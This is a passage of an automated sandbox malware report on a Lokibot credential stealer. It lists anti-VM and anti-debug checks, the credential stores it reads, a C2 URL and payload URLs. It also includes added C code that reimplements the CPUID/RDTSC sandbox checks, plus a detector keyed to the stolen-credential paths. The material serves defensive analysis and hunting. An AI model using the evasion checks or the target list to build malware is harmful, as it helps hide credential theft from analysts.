Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000002BC6D22 second address: 0000000002BC6D22 instructions:
    0x00000000 rdtsc
    0x00000002 lfence
    0x00000005 shl edx, 20h
    0x00000008 or edx, eax
    0x0000000a ret
    0x0000000b mov esi, edx
    0x0000000d pushad
    0x0000000e xor eax, eax
    0x00000010 inc eax
    0x00000011 cpuid
    0x00000013 bt ecx, 1Fh
    0x00000017 jc 00007F0FBC870ADEh
    0x0000001d popad
    0x0000001e call 00007F0FBC87053Ah
    0x00000023 lfence
    0x00000026 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | RDTSC instruction interceptor: First address: 0000000000566D22 second address: 0000000000566D22 instructions:
    0x00000000 rdtsc
    0x00000002 lfence
    0x00000005 shl edx, 20h
    0x00000008 or edx, eax
    0x0000000a ret
    0x0000000b mov esi, edx
    0x0000000d pushad
    0x0000000e xor eax, eax
    0x00000010 inc eax
    0x00000011 cpuid
    0x00000013 bt ecx, 1Fh
    0x00000017 jc 00007F0FBC78853Eh
    0x0000001d popad
    0x0000001e call 00007F0FBC787F9Ah
    0x00000023 lfence
    0x00000026 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0977 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Window / User API: threadDelayed 1628
Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 6576 | Thread sleep count: 1628 > 30
Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 4504 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 4504 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Thread sleep count: Count: 1628 delay: -5
Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWayer LightWeight Filter-0000
Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
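The interceptor dumps above show two CPU-level checks. The first is CPUID with EAX=1 followed by "bt ecx, 1Fh / jc": ECX bit 31 of that leaf is the hypervisor-present flag. The second brackets a CPUID between RDTSC reads inside a counted loop ("dec dword ptr [ebp+F8h] / jne"), so the cost of a CPUID is sampled many times rather than once; the reads of [7FFE0014h] are KUSER_SHARED_DATA.SystemTime.LowPart, which gives the loop a second clock to compare the cycle counter against. The following is an added example, not code from the report or from GuLoader, that reimplements those two checks portably (Linux, x86, GCC or Clang) so an analyst can run it inside a candidate sandbox VM and see what this sample would see. The 1000-cycle threshold, the 2000-sample count and every function name are assumptions of this example, and the SystemTime comparison is left out because it is Windows-specific.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#include <x86intrin.h>
#define HAVE_X86 1
#else
#define HAVE_X86 0   /* non-x86 build: the CPU checks report "not applicable" */
#endif

/* Assumptions of this example, not values from the report. Bare metal usually
 * executes CPUID in the low hundreds of cycles; a VM exit pushes it past 1000. */
#define CPUID_VM_THRESHOLD_CYCLES 1000u
#define HAMMER_ITERATIONS 2000u

/* Check 1: CPUID leaf 1, ECX bit 31 = hypervisor present. This is the dump's
 * "xor eax,eax / inc eax / cpuid / bt ecx,1Fh / jc" sequence. */
bool cpuid_hypervisor_present(void)
{
#if HAVE_X86
    unsigned int eax, ebx, ecx, edx;
    if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx))
        return false;
    return (ecx >> 31) & 1u;
#else
    return false;
#endif
}

/* One sample of check 2: cycles spent in a single CPUID, bracketed by RDTSC and
 * fenced so neither read is reordered around it. CPUID always traps to the
 * hypervisor, which is what makes it slow under a VM. */
static uint64_t cpuid_cycles_once(void)
{
#if HAVE_X86
    unsigned int eax, ebx, ecx, edx;
    uint64_t t0, t1;
    __asm__ __volatile__("lfence" ::: "memory");
    t0 = __rdtsc();
    __cpuid(1, eax, ebx, ecx, edx);
    t1 = __rdtsc();
    __asm__ __volatile__("lfence" ::: "memory");
    (void)eax; (void)ebx; (void)ecx; (void)edx;
    return t1 - t0;
#else
    return 0;
#endif
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n samples; works on a copy so the caller's buffer is untouched. */
uint64_t median_u64(const uint64_t *samples, size_t n)
{
    if (n == 0) return 0;
    uint64_t *copy = malloc(n * sizeof *copy);
    if (!copy) return 0;
    memcpy(copy, samples, n * sizeof *copy);
    qsort(copy, n, sizeof *copy, cmp_u64);
    uint64_t m = copy[n / 2];
    free(copy);
    return m;
}

/* "Hammering": take many samples and use the median, so a single interrupt or
 * context switch cannot fake a bare-metal result, and so that anything
 * single-stepping or instrumenting the loop pays for every iteration (the
 * dump's dec [ebp+F8h] / jne loop serves the same purpose). */
uint64_t cpuid_cycles_median(size_t iterations)
{
    if (iterations == 0) return 0;
    uint64_t *s = malloc(iterations * sizeof *s);
    if (!s) return 0;
    for (size_t i = 0; i < iterations; i++)
        s[i] = cpuid_cycles_once();
    uint64_t m = median_u64(s, iterations);
    free(s);
    return m;
}

/* Decision rule for check 2. */
bool timing_suggests_vm(uint64_t median_cycles)
{
    return median_cycles > CPUID_VM_THRESHOLD_CYCLES;
}

int main(void)
{
    uint64_t m = cpuid_cycles_median(HAMMER_ITERATIONS);
    printf("x86 checks applicable: %s\n", HAVE_X86 ? "yes" : "no");
    printf("hypervisor bit (CPUID.1:ECX[31]): %s\n",
           cpuid_hypervisor_present() ? "set" : "clear");
    printf("median CPUID cost: %llu cycles -> %s\n", (unsigned long long)m,
           timing_suggests_vm(m) ? "looks virtualized" : "looks bare-metal");
    return 0;
}
```

Run it once on the analysis VM and once on bare metal to calibrate the threshold for your own hardware before trusting either verdict; a sandbox that hides the hypervisor bit but still traps CPUID will pass check 1 and fail check 2, which is exactly the gap the loop in the dump is built to find.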

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0699 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?
Hides threads from debuggers
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC0977 rdtsc
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC72EF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC641D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC7604 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC27A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC35F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC35EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC1F69 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC6963 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC754F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Process created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe'
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Code function: 0_2_02BC36C7 cpuid
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\PO-A2174679-06.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
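The registry keys and the Chrome file listed above are the credential stores this Lokibot build enumerates, and they are the most packer-independent hunting artefact in the report: a process that is not an SSH, FTP, mail or browser client touching several of them in quick succession is a strong signal whatever loader delivered it. The following is an added example, not code from the report or from Lokibot, of that matching logic in C. It rewrites the HKU\<SID>\ and HKCU\ spellings that a Sysmon registry event uses onto the HKEY_CURRENT_USER form used in the report, matches paths case-insensitively against the target list, and scores a batch of event lines. The 'key=value|...' line layout, the SID, the benign explorer.exe event and the file-access event are constructed for this example (Sysmon logs file creates, not reads, so the Chrome line stands in for an EDR file-access event); the target paths are the ones from the section above.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct target { const char *needle; const char *label; };

/* Credential stores from the report's Stealing of Sensitive Information
 * section, matched as case-insensitive substrings after hive normalisation
 * so that a key and any of its subkeys or values both hit. */
static const struct target TARGETS[] = {
    { "HKEY_CURRENT_USER\\Software\\9bis.com\\KiTTY\\Sessions",             "ssh-client:KiTTY" },
    { "HKEY_CURRENT_USER\\Software\\Martin Prikryl",                        "ssh-client:WinSCP" },
    { "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts",             "ftp-client:Far2" },
    { "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts",              "ftp-client:Far" },
    { "HKEY_CURRENT_USER\\Software\\NCH Software\\ClassicFTP\\FTPAccounts", "ftp-client:ClassicFTP" },
    { "HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities",               "mail:IncrediMail" },
    { "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\"
      "Windows Messaging Subsystem\\Profiles\\Outlook",                     "mail:Outlook" },
    { "\\Google\\Chrome\\User Data\\Default\\Login Data",                   "browser:Chrome" },
};
#define NTARGETS (sizeof TARGETS / sizeof TARGETS[0])

static bool ci_prefix(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return false;          /* also stops at the end of s */
    return true;
}

static bool ci_contains(const char *hay, const char *needle)
{
    for (; *hay; hay++)
        if (ci_prefix(hay, needle))
            return true;
    return false;
}

/* Sysmon writes user hives as HKU\<SID>\...; analysts write HKCU\... .
 * Map both onto the HKEY_CURRENT_USER\... spelling the report uses. */
void normalize_hive(const char *path, char *out, size_t outsz)
{
    const char *rest = NULL;
    if (ci_prefix(path, "HKCU\\")) {
        rest = path + 5;
    } else if (ci_prefix(path, "HKU\\")) {
        const char *sep = strchr(path + 4, '\\');   /* skip the SID component */
        rest = sep ? sep + 1 : path + 4;
    }
    if (rest) snprintf(out, outsz, "HKEY_CURRENT_USER\\%s", rest);
    else      snprintf(out, outsz, "%s", path);
}

/* Label of the first credential store the path touches, or NULL. */
const char *classify_access(const char *raw_path)
{
    char norm[1024];
    normalize_hive(raw_path, norm, sizeof norm);
    for (size_t i = 0; i < NTARGETS; i++)
        if (ci_contains(norm, TARGETS[i].needle))
            return TARGETS[i].label;
    return NULL;
}

/* Copy the value of "key=" out of a '|'-delimited event line. */
static bool field(const char *line, const char *key, char *out, size_t outsz)
{
    const char *p = strstr(line, key);
    if (!p) return false;
    p += strlen(key);
    const char *end = strchr(p, '|');
    size_t len = end ? (size_t)(end - p) : strlen(p);
    if (len >= outsz) len = outsz - 1;
    memcpy(out, p, len);
    out[len] = '\0';
    return true;
}

/* Constructed events: four from the sample, one benign autorun read by explorer.exe. */
static const char *const SAMPLE_EVENTS[] = {
    "EventID=12|Image=C:\\Users\\user\\Desktop\\PO-A2174679-06.exe|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Martin Prikryl\\WinSCP 2\\Sessions",
    "EventID=12|Image=C:\\Users\\user\\Desktop\\PO-A2174679-06.exe|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\9bis.com\\KiTTY\\Sessions",
    "EventID=file_read|Image=C:\\Users\\user\\Desktop\\PO-A2174679-06.exe|TargetFilename=C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    "EventID=12|Image=C:\\Windows\\explorer.exe|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "EventID=13|Image=C:\\Users\\user\\Desktop\\PO-A2174679-06.exe|TargetObject=HKCU\\Software\\IncrediMail\\Identities\\{A1}",
};
#define NSAMPLE_EVENTS (sizeof SAMPLE_EVENTS / sizeof SAMPLE_EVENTS[0])

/* Number of events in the batch that touch a credential store. */
size_t count_credential_store_hits(const char *const *events, size_t n)
{
    size_t hits = 0;
    char path[1024];
    for (size_t i = 0; i < n; i++) {
        if (!field(events[i], "TargetObject=", path, sizeof path) &&
            !field(events[i], "TargetFilename=", path, sizeof path))
            continue;
        if (classify_access(path)) hits++;
    }
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < NSAMPLE_EVENTS; i++) {
        char path[1024] = "";
        const char *label = NULL;
        if (field(SAMPLE_EVENTS[i], "TargetObject=", path, sizeof path) ||
            field(SAMPLE_EVENTS[i], "TargetFilename=", path, sizeof path))
            label = classify_access(path);
        printf("%-22s %s\n", label ? label : "-", path);
    }
    printf("%zu of %zu events hit a credential store\n",
           count_credential_store_hits(SAMPLE_EVENTS, NSAMPLE_EVENTS), NSAMPLE_EVENTS);
    return 0;
}
```

In production the per-event label matters less than the count per process within a short window: one hit is a legitimate client reading its own settings, four distinct stores from one unsigned binary in a few seconds is the stealer.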

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY

Mitre Att&ck Matrix

(Rebuilt from the flattened matrix, one line per tactic column. Bracketed digits are the count badges the report attaches to observed techniques, reproduced exactly as extracted.)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection [12]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [23]; Process Injection [12]; Obfuscated Files or Information [1]; Software Packing; Steganography
Credential Access: OS Credential Dumping [2]; Input Capture [1]; Credentials in Registry [1]; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [721]; Virtualization/Sandbox Evasion [23]; Process Discovery [1]; Application Window Discovery [1]; Remote System Discovery [1]; System Information Discovery [323]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Email Collection [1]; Input Capture [1]; Archive Collected Data [1]; Data from Local System [2]; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [3]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Behavior Graph

(The behavior graph is an image in the original report and is not reproduced in this text extract.)

Screenshots

(The screenshot thumbnails of the Windows analysis desktop are images in the original report and are not reproduced in this text extract.)

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner
PO-A2174679-06.exe | 16% | Virustotal
PO-A2174679-06.exe | 2% | ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

Source | Detection | Scanner
accessasia.com.hk | 0% | Virustotal

              URLs

Source | Detection | Scanner | Label
http://accessasia.com.hk/ovation/five/fre.php | 0% | Avira URL Cloud | safe
http://sinatrasmob.com/pro/ovation_byHOXsph232.bin | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
accessasia.com.hk | 192.185.78.145 | true | true | (none) | unknown
onedrive.live.com | unknown | unknown | false | (none) | high
hrf0ga.bn.files.1drv.com | unknown | unknown | false | (none) | high

                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://accessasia.com.hk/ovation/five/fre.php | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.bin | PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | false | (none) | high
https://onedrive.live.com/n | PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | false | (none) | high
https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQa | PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | false | (none) | high
https://onedrive.live.com/ | PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | false | (none) | high
https://hrf0ga.bn.files.1drv.com/ | PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmp | false | (none) | high
http://sinatrasmob.com/pro/ovation_byHOXsph232.bin | PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.78.145 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:356484
                            Start date:23.02.2021
                            Start time:08:47:07
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:PO-A2174679-06.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/2@43/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 3.7% (good quality ratio 1%)
                            • Quality average: 10%
                            • Quality standard deviation: 17.1%
                            HCA Information:
                            • Successful, ratio: 70%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • HTTP Packets have been reduced
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 168.61.161.212, 51.104.139.180, 51.103.5.186, 52.147.198.201, 23.218.209.198, 13.88.21.125, 92.122.145.220, 40.88.32.150, 23.218.208.56, 51.11.168.160, 8.253.204.249, 8.248.117.254, 67.26.73.254, 8.253.204.120, 8.248.133.254, 92.122.213.247, 92.122.213.194, 13.107.42.13, 13.107.43.12, 52.155.217.156, 20.54.26.129
                            • Excluded domains from analysis (whitelisted): odc-bn-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, odc-bn-files-geo.onedrive.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, odc-bn-files-brs.onedrive.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, displaycatalog.mp.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, l-0003.dc-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
08:49:27 | API Interceptor | 38x Sleep call for process: PO-A2174679-06.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

Match: UNIFIEDLAYER-AS-1US

Associated Sample Name / URL | Detection | Context (IP)
22 FEB -PROCESSING.xlsx | malicious | 108.167.156.42
CV-JOB REQUEST______PDF.EXE | malicious | 192.185.181.49
PO.exe | malicious | 192.185.0.218
Complaint-1091191320-02182021.xls | malicious | 192.185.16.95
ESCANEAR_FACTURA-20794564552_docx.exe | malicious | 162.214.158.75
AWB-INVOICE_PDF.exe | malicious | 192.185.46.55
iAxkn PDF.exe | malicious | 192.185.100.181
carta de pago pdf.exe | malicious | 192.185.5.166
PO.exe | malicious | 108.179.232.42
payment details.pdf.exe | malicious | 50.87.95.32
new order.exe | malicious | 108.179.232.42
CV-JOB REQUEST______pdf.exe | malicious | 192.185.181.49
RdLlHaxEKP.exe | malicious | 162.214.184.71
Drawings2.exe | malicious | 198.57.247.220
EFT Remittance.xls | malicious | 162.241.120.180
Remittance Advice.xls | malicious | 162.241.120.180
Complaint_Letter_1212735678-02192021.xls | malicious | 192.185.17.119
Complaint_Letter_1212735678-02192021.xls | malicious | 192.185.17.119
SecuriteInfo.com.BehavesLike.Win32.Generic.ch.exe | malicious | 162.241.194.14
SecuriteInfo.com.Trojan.PackedNET.546.1336.exe | malicious | 162.214.184.71

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type: very short file (no magic)
                            Category: dropped
                            Size (bytes): 1
                            Entropy (8bit): 0.0
                            Encrypted: false
                            SSDEEP: 3:U:U
                            MD5: C4CA4238A0B923820DCC509A6F75849B
                            SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious: false
                            Reputation: high, very likely benign file
                            Preview: 1
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type: data
                            Category: dropped
                            Size (bytes): 7379
                            Entropy (8bit): 0.6787210715847813
                            Encrypted: false
                            SSDEEP: 12:fMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMet:9
                            MD5: DB6D68BC10AB34D28026CA8336B4E986
                            SHA1: 7FE6C2D23DC859C0F3C2759679AE97CA6739AC9F
                            SHA-256: E8D86E10D4E8AEA44D547EDB65B18CC175894E362B31152AF38AEA03D9B93DB9
                            SHA-512: DA28A192C54BDD97D81A7D2ECE5B161220B6B7D9DD7C6CDE4F469A8F3EB0161C6A5A0588161377370C89EA9C421AAE396AE0E2BB481C287625A8B31472658D6D
                            Malicious: false
                            Reputation: low
                            Preview: ........................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user..............

                            Static File Info

                            General

                            File type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit): 5.623116556460363
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.15%
